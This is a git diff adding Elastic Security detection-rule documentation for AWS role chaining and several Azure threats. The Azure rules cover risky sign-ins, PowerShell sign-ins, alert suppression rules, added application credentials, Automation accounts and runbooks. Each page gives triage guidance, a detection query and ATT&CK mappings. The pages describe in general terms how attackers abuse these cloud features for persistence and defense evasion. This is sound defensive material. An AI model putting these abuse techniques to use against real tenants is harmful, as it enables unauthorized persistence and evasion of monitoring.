chaining. + +**3. Scope and hunt** +- Search for additional AssumeRole activity by the same `issuer.arn` or `resources.arn` across other accounts and regions. +- Look for privilege escalation attempts (for example, IAM `AttachRolePolicy`, `UpdateAssumeRolePolicy`) or sensitive data access following the chain. + +**4. Recovery & hardening** +- Apply least privilege to all roles, limiting trust policies to only required principals. +- Enforce MFA where possible on AssumeRole operations. +- Periodically review role chaining patterns to validate necessity; remove unused or risky trust relationships. +- Document and tune new terms exceptions for known, legitimate chains. + + +*Additional information* + + +- https://github.com/aws-samples/aws-incident-response-playbooks/[AWS IR Playbooks]: NIST-aligned templates for evidence, containment, eradication, recovery, post-incident. +- https://github.com/aws-samples/aws-customer-playbook-framework/[AWS Customer Playbook Framework]: Practical response steps for account and IAM misuse scenarios +- AWS IAM Best Practices: https://docs.aws.amazon.com/IAM/latest/UserGuide/best-practices.html[AWS docs] for reducing risk from temporary credentials. + +==== Setup + + +The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. + +==== Rule query + + +[source, js] +---------------------------------- + event.dataset : "aws.cloudtrail" and + event.provider : "sts.amazonaws.com" and + event.action : "AssumeRole" and + aws.cloudtrail.user_identity.type : "AssumedRole" and + event.outcome : "success" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Abuse Elevation Control Mechanism +** ID: T1548 +** Reference URL: https://attack.mitre.org/techniques/T1548/ +* Tactic: +** Name: Lateral Movement +** ID: TA0008 +** Reference URL: https://attack.mitre.org/tactics/TA0008/ +* Technique: +** Name: Use Alternate Authentication Material +** ID: T1550 +** Reference URL: https://attack.mitre.org/techniques/T1550/ +* Sub-technique: +** Name: Application Access Token +** ID: T1550.001 +** Reference URL: https://attack.mitre.org/techniques/T1550/001/ +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-active-directory-high-risk-user-sign-in-heuristic.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-active-directory-high-risk-user-sign-in-heuristic.asciidoc new file mode 100644 index 0000000000..b1b500a85d --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-active-directory-high-risk-user-sign-in-heuristic.asciidoc @@ -0,0 +1,128 @@ +[[prebuilt-rule-8-19-8-azure-active-directory-high-risk-user-sign-in-heuristic]] +=== Azure Active Directory High Risk User Sign-in Heuristic + +Identifies high risk Azure Active Directory (AD) sign-ins by leveraging Microsoft Identity Protection machine learning and heuristics. + +*Rule type*: query + +*Rule indices*: + +* logs-azure.signinlogs-* +* filebeat-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-azure-monitor-sign-ins-log-schema +* https://docs.microsoft.com/en-us/azure/active-directory/identity-protection/overview-identity-protection +* https://docs.microsoft.com/en-us/azure/active-directory/identity-protection/howto-identity-protection-investigate-risk +* https://docs.microsoft.com/en-us/azure/active-directory/identity-protection/howto-identity-protection-investigate-risk#investigation-framework + +*Tags*: + +* Domain: Cloud +* Data Source: Azure +* Use Case: Identity and Access Audit +* Resources: Investigation Guide +* Tactic: Initial Access + +*Version*: 108 + +*Rule authors*: + +* Austin Songer + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Azure Active Directory High Risk User Sign-in Heuristic* + + +Microsoft Identity Protection is an Azure AD security tool that detects various types of identity risks and attacks. + +This rule identifies events produced by the Microsoft Identity Protection with a risk state equal to `confirmedCompromised` or `atRisk`. + + +*Possible investigation steps* + + +- Identify the Risk Detection that triggered the event. A list with descriptions can be found https://docs.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#risk-types-and-detection[here]. +- Identify the user account involved and validate whether the suspicious activity is normal for that user. + - Consider the source IP address and geolocation for the involved user account. Do they look normal? + - Consider the device used to sign in. Is it registered and compliant? +- Investigate other alerts associated with the user account during the past 48 hours. +- Contact the account owner and confirm whether they are aware of this activity. +- Check if this operation was approved and performed according to the organization's change management policy. +- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services, and data accessed by the account in the last 24 hours. + + +*False positive analysis* + + +If this rule is noisy in your environment due to expected activity, consider adding exceptions — preferably with a combination of user and device conditions. + + +*Response and remediation* + + +- Initiate the incident response process based on the outcome of the triage. +- Disable or limit the account during the investigation and response. +- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context: + - Identify the account role in the cloud environment. + - Assess the criticality of affected services and servers. + - Work with your IT team to identify and minimize the impact on users. + - Identify if the attacker is moving laterally and compromising other accounts, servers, or services. + - Identify any regulatory or legal ramifications related to this activity. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with your IT teams to minimize the impact on business operations during these actions. +- Check if unauthorized new users were created, remove unauthorized new accounts, and request password resets for other IAM users. +- Consider enabling multi-factor authentication for users. +- Follow security best practices https://docs.microsoft.com/en-us/azure/security/fundamentals/identity-management-best-practices[outlined] by Microsoft. +- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + +==== Setup + + +The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:azure.signinlogs and + azure.signinlogs.properties.risk_state:("confirmedCompromised" or "atRisk") and event.outcome:(success or Success) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Cloud Accounts +** ID: T1078.004 +** Reference URL: https://attack.mitre.org/techniques/T1078/004/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-active-directory-powershell-sign-in.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-active-directory-powershell-sign-in.asciidoc new file mode 100644 index 0000000000..e5b03fae47 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-active-directory-powershell-sign-in.asciidoc @@ -0,0 +1,138 @@ +[[prebuilt-rule-8-19-8-azure-active-directory-powershell-sign-in]] +=== Azure Active Directory PowerShell Sign-in + +Identifies a sign-in using the Azure Active Directory PowerShell module. PowerShell for Azure Active Directory allows for managing settings from the command line, which is intended for users who are members of an admin role. + +*Rule type*: query + +*Rule indices*: + +* logs-azure.signinlogs-* +* filebeat-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/ +* https://docs.microsoft.com/en-us/microsoft-365/enterprise/connect-to-microsoft-365-powershell?view=o365-worldwide + +*Tags*: + +* Domain: Cloud +* Data Source: Azure +* Use Case: Identity and Access Audit +* Resources: Investigation Guide +* Tactic: Initial Access + +*Version*: 108 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Azure Active Directory PowerShell Sign-in* + + +Azure Active Directory PowerShell for Graph (Azure AD PowerShell) is a module IT professionals commonly use to manage their Azure Active Directory. The cmdlets in the Azure AD PowerShell module enable you to retrieve data from the directory, create new objects in the directory, update existing objects, remove objects, as well as configure the directory and its features. + +This rule identifies sign-ins that use the Azure Active Directory PowerShell module, which can indicate unauthorized access if done outside of IT or engineering. + + +*Possible investigation steps* + + +- Identify the user account that performed the action and whether it should perform this kind of action. +- Evaluate whether the user needs to access Azure AD using PowerShell to complete its tasks. +- Investigate other alerts associated with the user account during the past 48 hours. +- Consider the source IP address and geolocation for the involved user account. Do they look normal? +- Contact the account owner and confirm whether they are aware of this activity. +- Investigate suspicious actions taken by the user using the module, for example, modifications in security settings that weakens the security policy, persistence-related tasks, and data access. +- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services, and data accessed by the account in the last 24 hours. + + +*False positive analysis* + + +- If this activity is expected and noisy in your environment, consider adding IT, Engineering, and other authorized users as exceptions — preferably with a combination of user and device conditions. + + +*Response and remediation* + + +- Initiate the incident response process based on the outcome of the triage. +- Disable or limit the account during the investigation and response. +- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context: + - Identify the account role in the cloud environment. + - Assess the criticality of affected services and servers. + - Work with your IT team to identify and minimize the impact on users. + - Identify if the attacker is moving laterally and compromising other accounts, servers, or services. + - Identify any regulatory or legal ramifications related to this activity. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with your IT teams to minimize the impact on business operations during these actions. +- Check if unauthorized new users were created, remove unauthorized new accounts, and request password resets for other IAM users. +- Consider enabling multi-factor authentication for users. +- Follow security best practices https://docs.microsoft.com/en-us/azure/security/fundamentals/identity-management-best-practices[outlined] by Microsoft. +- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + +==== Setup + + +The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:azure.signinlogs and + azure.signinlogs.properties.app_display_name:"Azure Active Directory PowerShell" and + azure.signinlogs.properties.token_issuer_type:AzureAD and event.outcome:(success or Success) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Cloud Accounts +** ID: T1078.004 +** Reference URL: https://attack.mitre.org/techniques/T1078/004/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-alert-suppression-rule-created-or-modified.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-alert-suppression-rule-created-or-modified.asciidoc new file mode 100644 index 0000000000..fa41e3623a --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-alert-suppression-rule-created-or-modified.asciidoc @@ -0,0 +1,118 @@ +[[prebuilt-rule-8-19-8-azure-alert-suppression-rule-created-or-modified]] +=== Azure Alert Suppression Rule Created or Modified + +Identifies the creation of suppression rules in Azure. Suppression rules are a mechanism used to suppress alerts previously identified as false positives or too noisy to be in production. This mechanism can be abused or mistakenly configured, resulting in defense evasions and loss of security visibility. + +*Rule type*: query + +*Rule indices*: + +* logs-azure.activitylogs-* +* filebeat-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations +* https://docs.microsoft.com/en-us/rest/api/securitycenter/alerts-suppression-rules/update + +*Tags*: + +* Domain: Cloud +* Data Source: Azure +* Use Case: Configuration Audit +* Tactic: Defense Evasion +* Resources: Investigation Guide + +*Version*: 106 + +*Rule authors*: + +* Austin Songer + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Azure Alert Suppression Rule Created or Modified* + + +Azure Alert Suppression Rules are used to manage alert noise by filtering out known false positives. However, adversaries can exploit these rules to hide malicious activities by suppressing legitimate security alerts. The detection rule monitors Azure activity logs for successful operations related to suppression rule changes, helping identify potential misuse that could lead to defense evasion and reduced security visibility. + + +*Possible investigation steps* + + +- Review the Azure activity logs to identify the specific suppression rule that was created or modified by filtering logs with the operation name "MICROSOFT.SECURITY/ALERTSSUPPRESSIONRULES/WRITE" and ensuring the event outcome is "success". +- Determine the identity of the user or service principal that performed the operation by examining the associated user or service account details in the activity logs. +- Investigate the context and justification for the creation or modification of the suppression rule by checking any related change management records or communications. +- Assess the impact of the suppression rule on security visibility by identifying which alerts are being suppressed and evaluating whether these alerts are critical for detecting potential threats. +- Cross-reference the suppression rule changes with recent security incidents or alerts to determine if there is any correlation or if the rule could have been used to hide malicious activity. +- Verify the legitimacy of the suppression rule by consulting with relevant stakeholders, such as security operations or cloud management teams, to confirm if the change was authorized and aligns with security policies. + + +*False positive analysis* + + +- Routine maintenance activities by IT staff may trigger alerts when legitimate suppression rules are created or modified. To manage this, establish a baseline of expected changes and create exceptions for known maintenance periods or personnel. +- Automated processes or scripts that regularly update suppression rules for operational efficiency can generate false positives. Identify these processes and exclude their activity from alerting by using specific identifiers or tags associated with the automation. +- Changes made by trusted third-party security services that integrate with Azure might be flagged. Verify the legitimacy of these services and whitelist their operations to prevent unnecessary alerts. +- Frequent updates to suppression rules due to evolving security policies can lead to false positives. Document these policy changes and adjust the alerting criteria to accommodate expected modifications. +- Temporary suppression rules created during incident response to manage alert noise can be mistaken for malicious activity. Ensure these rules are documented and time-bound, and exclude them from alerting during the response period. + + +*Response and remediation* + + +- Immediately review the Azure activity logs to confirm the creation or modification of the suppression rule and identify the user or service account responsible for the change. +- Temporarily disable the suspicious suppression rule to restore visibility into potential security alerts that may have been suppressed. +- Conduct a thorough investigation of recent alerts that were suppressed by the rule to determine if any malicious activities were overlooked. +- If malicious activity is confirmed, initiate incident response procedures to contain and remediate the threat, including isolating affected resources and accounts. +- Escalate the incident to the security operations team for further analysis and to assess the potential impact on the organization's security posture. +- Implement additional monitoring and alerting for changes to suppression rules to ensure any future modifications are promptly detected and reviewed. +- Review and update access controls and permissions for creating or modifying suppression rules to ensure only authorized personnel can make such changes. + +==== Setup + + +The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:azure.activitylogs and azure.activitylogs.operation_name:"MICROSOFT.SECURITY/ALERTSSUPPRESSIONRULES/WRITE" and +event.outcome: "success" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-application-credential-modification.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-application-credential-modification.asciidoc new file mode 100644 index 0000000000..0e880e53ce --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-application-credential-modification.asciidoc @@ -0,0 +1,120 @@ +[[prebuilt-rule-8-19-8-azure-application-credential-modification]] +=== Azure Application Credential Modification + +Identifies when a new credential is added to an application in Azure. An application may use a certificate or secret string to prove its identity when requesting a token. Multiple certificates and secrets can be added for an application and an adversary may abuse this by creating an additional authentication method to evade defenses or persist in an environment. + +*Rule type*: query + +*Rule indices*: + +* logs-azure.auditlogs-* +* filebeat-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/ + +*Tags*: + +* Domain: Cloud +* Data Source: Azure +* Use Case: Identity and Access Audit +* Tactic: Persistence +* Resources: Investigation Guide + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Azure Application Credential Modification* + + +Azure applications use credentials like certificates or secret strings for identity verification during token requests. Adversaries may exploit this by adding unauthorized credentials, enabling persistent access or evading defenses. The detection rule monitors audit logs for successful updates to application credentials, flagging potential misuse by identifying unauthorized credential modifications. + + +*Possible investigation steps* + + +- Review the Azure audit logs to identify the specific application that had its credentials updated, focusing on entries with the operation name "Update application - Certificates and secrets management" and a successful outcome. +- Determine the identity of the user or service principal that performed the credential modification by examining the associated user or principal ID in the audit log entry. +- Investigate the context of the credential modification by checking for any recent changes or unusual activities related to the application, such as modifications to permissions or roles. +- Assess the legitimacy of the new credential by verifying if it aligns with expected operational procedures or if it was authorized by a known and trusted entity. +- Check for any additional suspicious activities in the audit logs around the same timeframe, such as failed login attempts or other modifications to the application, to identify potential indicators of compromise. +- Contact the application owner or relevant stakeholders to confirm whether the credential addition was expected and authorized, and gather any additional context or concerns they might have. + + +*False positive analysis* + + +- Routine credential updates by authorized personnel can trigger alerts. Regularly review and document credential management activities to distinguish between legitimate and suspicious actions. +- Automated processes or scripts that update application credentials as part of maintenance or deployment cycles may cause false positives. Identify and whitelist these processes to prevent unnecessary alerts. +- Credential updates during application scaling or migration might be flagged. Coordinate with IT teams to schedule these activities and temporarily adjust monitoring thresholds or exclusions. +- Third-party integrations that require periodic credential updates can be mistaken for unauthorized changes. Maintain an inventory of such integrations and establish baseline behaviors to filter out benign activities. +- Frequent updates by specific service accounts could be part of normal operations. Monitor these accounts separately and consider creating exceptions for known, non-threatening patterns. + + +*Response and remediation* + + +- Immediately revoke the unauthorized credentials by accessing the Azure portal and removing any suspicious certificates or secret strings associated with the affected application. +- Conduct a thorough review of the application's access logs to identify any unauthorized access or actions performed using the compromised credentials. +- Reset and update all legitimate credentials for the affected application to ensure no further unauthorized access can occur. +- Notify the security team and relevant stakeholders about the incident, providing details of the unauthorized credential modification and any potential impact. +- Implement additional monitoring on the affected application to detect any further unauthorized changes or access attempts. +- Review and tighten access controls and permissions for managing application credentials to prevent unauthorized modifications in the future. +- If necessary, escalate the incident to higher-level security management or external cybersecurity experts for further investigation and response. + +==== Setup + + +The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:azure.auditlogs and azure.auditlogs.operation_name:"Update application - Certificates and secrets management" and event.outcome:(success or Success) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Account Manipulation +** ID: T1098 +** Reference URL: https://attack.mitre.org/techniques/T1098/ +* Sub-technique: +** Name: Additional Cloud Credentials +** ID: T1098.001 +** Reference URL: https://attack.mitre.org/techniques/T1098/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-automation-account-created.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-automation-account-created.asciidoc new file mode 100644 index 0000000000..b9fe03c561 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-automation-account-created.asciidoc @@ -0,0 +1,125 @@ +[[prebuilt-rule-8-19-8-azure-automation-account-created]] +=== Azure Automation Account Created + +Identifies when an Azure Automation account is created. Azure Automation accounts can be used to automate management tasks and orchestrate actions across systems. An adversary may create an Automation account in order to maintain persistence in their target's environment. + +*Rule type*: query + +*Rule indices*: + +* logs-azure.activitylogs-* +* filebeat-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://powerzure.readthedocs.io/en/latest/Functions/operational.html#create-backdoor +* https://github.com/hausec/PowerZure +* https://posts.specterops.io/attacking-azure-azure-ad-and-introducing-powerzure-ca70b330511a +* https://azure.microsoft.com/en-in/blog/azure-automation-runbook-management/ + +*Tags*: + +* Domain: Cloud +* Data Source: Azure +* Use Case: Identity and Access Audit +* Tactic: Persistence +* Resources: Investigation Guide + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Azure Automation Account Created* + + +Azure Automation accounts facilitate the automation of management tasks and orchestration across cloud environments, enhancing operational efficiency. However, adversaries may exploit these accounts to establish persistence by automating malicious activities. The detection rule monitors the creation of these accounts by analyzing specific Azure activity logs, focusing on successful operations, to identify potential unauthorized or suspicious account creations. + + +*Possible investigation steps* + + +- Review the Azure activity logs to confirm the creation of the Automation account by checking for the operation name "MICROSOFT.AUTOMATION/AUTOMATIONACCOUNTS/WRITE" and ensure the event outcome is marked as Success. +- Identify the user or service principal that initiated the creation of the Automation account by examining the associated user identity information in the activity logs. +- Investigate the context of the Automation account creation by reviewing recent activities performed by the identified user or service principal to determine if there are any other suspicious or unauthorized actions. +- Check the configuration and permissions of the newly created Automation account to ensure it does not have excessive privileges that could be exploited for persistence or lateral movement. +- Correlate the Automation account creation event with other security alerts or logs to identify any patterns or indicators of compromise that may suggest malicious intent. + + +*False positive analysis* + + +- Routine administrative tasks may trigger the rule when legitimate users create Azure Automation accounts for operational purposes. To manage this, maintain a list of authorized personnel and their expected activities, and cross-reference alerts with this list. +- Automated deployment scripts or infrastructure-as-code tools might create automation accounts as part of their normal operation. Identify these scripts and exclude their associated activities from triggering alerts by using specific identifiers or tags. +- Scheduled maintenance or updates by cloud service providers could result in the creation of automation accounts. Verify the timing and context of the account creation against known maintenance schedules and exclude these from alerts if they match. +- Development and testing environments often involve frequent creation and deletion of resources, including automation accounts. Implement separate monitoring rules or environments for these non-production areas to reduce noise in alerts. + + +*Response and remediation* + + +- Immediately review the Azure activity logs to confirm the creation of the Automation account and identify the user or service principal responsible for the action. +- Disable the newly created Azure Automation account to prevent any potential malicious automation tasks from executing. +- Conduct a thorough investigation of the user or service principal that created the account to determine if their credentials have been compromised or if they have acted maliciously. +- Reset credentials and enforce multi-factor authentication for the identified user or service principal to prevent unauthorized access. +- Review and adjust Azure role-based access control (RBAC) policies to ensure that only authorized personnel have the ability to create Automation accounts. +- Escalate the incident to the security operations team for further analysis and to determine if additional systems or accounts have been compromised. +- Implement enhanced monitoring and alerting for future Automation account creations to quickly detect and respond to similar threats. + +==== Setup + + +The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:azure.activitylogs and azure.activitylogs.operation_name:"MICROSOFT.AUTOMATION/AUTOMATIONACCOUNTS/WRITE" and event.outcome:(Success or success) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-automation-runbook-created-or-modified.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-automation-runbook-created-or-modified.asciidoc new file mode 100644 index 0000000000..99c4ff165e --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-automation-runbook-created-or-modified.asciidoc @@ -0,0 +1,126 @@ +[[prebuilt-rule-8-19-8-azure-automation-runbook-created-or-modified]] +=== Azure Automation Runbook Created or Modified + +Identifies when an Azure Automation runbook is created or modified. An adversary may create or modify an Azure Automation runbook to execute malicious code and maintain persistence in their target's environment. + +*Rule type*: query + +*Rule indices*: + +* logs-azure.activitylogs-* +* filebeat-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://powerzure.readthedocs.io/en/latest/Functions/operational.html#create-backdoor +* https://github.com/hausec/PowerZure +* https://posts.specterops.io/attacking-azure-azure-ad-and-introducing-powerzure-ca70b330511a +* https://azure.microsoft.com/en-in/blog/azure-automation-runbook-management/ + +*Tags*: + +* Domain: Cloud +* Data Source: Azure +* Use Case: Configuration Audit +* Tactic: Execution +* Resources: Investigation Guide + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Azure Automation Runbook Created or Modified* + + +Azure Automation Runbooks are scripts that automate tasks in cloud environments, enhancing operational efficiency. However, adversaries can exploit them to execute unauthorized code and maintain persistence. The detection rule monitors specific Azure activity logs for runbook creation or modification events, flagging successful operations to identify potential misuse. This helps in early detection of malicious activities, ensuring cloud security. + + +*Possible investigation steps* + + +- Review the Azure activity logs to identify the specific runbook that was created or modified, focusing on the operation names: "MICROSOFT.AUTOMATION/AUTOMATIONACCOUNTS/RUNBOOKS/DRAFT/WRITE", "MICROSOFT.AUTOMATION/AUTOMATIONACCOUNTS/RUNBOOKS/WRITE", or "MICROSOFT.AUTOMATION/AUTOMATIONACCOUNTS/RUNBOOKS/PUBLISH/ACTION". +- Check the event.outcome field to confirm the operation was successful, as indicated by the values "Success" or "success". +- Identify the user or service principal that performed the operation by examining the relevant user identity fields in the activity logs. +- Investigate the content and purpose of the runbook by reviewing its script or configuration to determine if it contains any unauthorized or suspicious code. +- Correlate the runbook activity with other security events or alerts in the environment to identify any patterns or related malicious activities. +- Verify if the runbook changes align with recent legitimate administrative activities or if they were unexpected, which could indicate potential misuse. + + +*False positive analysis* + + +- Routine updates or maintenance activities by authorized personnel can trigger alerts. To manage this, create exceptions for known maintenance windows or specific user accounts that regularly perform these tasks. +- Automated deployment processes that include runbook creation or modification might be flagged. Identify and exclude these processes by tagging them with specific identifiers in the logs. +- Integration with third-party tools that modify runbooks as part of their normal operation can result in false positives. Work with your IT team to whitelist these tools or their associated accounts. +- Frequent testing or development activities in non-production environments may cause alerts. Consider setting up separate monitoring rules or thresholds for these environments to reduce noise. +- Scheduled runbook updates for compliance or policy changes can be mistaken for suspicious activity. Document these schedules and adjust the detection rule to account for them, possibly by excluding specific operation names during these times. + + +*Response and remediation* + + +- Immediately isolate the affected Azure Automation account to prevent further unauthorized runbook executions. This can be done by disabling the account or restricting its permissions temporarily. +- Review the modified or newly created runbooks to identify any malicious code or unauthorized changes. Remove or revert any suspicious modifications to ensure the integrity of the automation scripts. +- Conduct a thorough audit of recent activities associated with the affected Azure Automation account, focusing on identifying any unauthorized access or changes made by adversaries. +- Reset credentials and update access controls for the affected Azure Automation account to prevent further unauthorized access. Ensure that only authorized personnel have the necessary permissions to create or modify runbooks. +- Implement additional monitoring and alerting for Azure Automation activities, specifically focusing on runbook creation and modification events, to enhance early detection of similar threats in the future. +- Escalate the incident to the security operations team for further investigation and to determine if additional systems or accounts have been compromised. +- Document the incident, including all actions taken and findings, to improve response strategies and update incident response plans for future reference. + +==== Setup + + +The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:azure.activitylogs and + azure.activitylogs.operation_name: + ( + "MICROSOFT.AUTOMATION/AUTOMATIONACCOUNTS/RUNBOOKS/DRAFT/WRITE" or + "MICROSOFT.AUTOMATION/AUTOMATIONACCOUNTS/RUNBOOKS/WRITE" or + "MICROSOFT.AUTOMATION/AUTOMATIONACCOUNTS/RUNBOOKS/PUBLISH/ACTION" + ) and + event.outcome:(Success or success) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Serverless Execution +** ID: T1648 +** Reference URL: https://attack.mitre.org/techniques/T1648/ diff --git 